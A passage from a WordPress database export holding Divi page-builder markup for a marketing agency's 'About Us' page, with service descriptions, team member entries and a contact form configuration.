custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||60px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" hover_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"Dhiraj\" title_text=\"Founder WhatTheHell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Shubham Jha\" position=\"Marketing Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.jpg\" facebook_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"Shubham\" title_text=\"Artboard (2)\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Sachin\" position=\"Art Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||56px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"56px||56px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-08 20:51:52','2020-08-08 20:51:52','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/392-revision-v1/',0,'revision','',0),(733,1,'2020-08-08 20:54:41','2020-08-08 20:54:41','Art Director WhatTheHell?','Art Director WhatTheHell?','','inherit','open','closed','','artboard-copy-7','','','2020-08-08 20:55:07','2020-08-08 20:55:07','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-7.jpg',0,'attachment','image/jpeg',0),(734,1,'2020-08-08 20:55:10','2020-08-08 20:55:10','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" parallax=\"on\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" 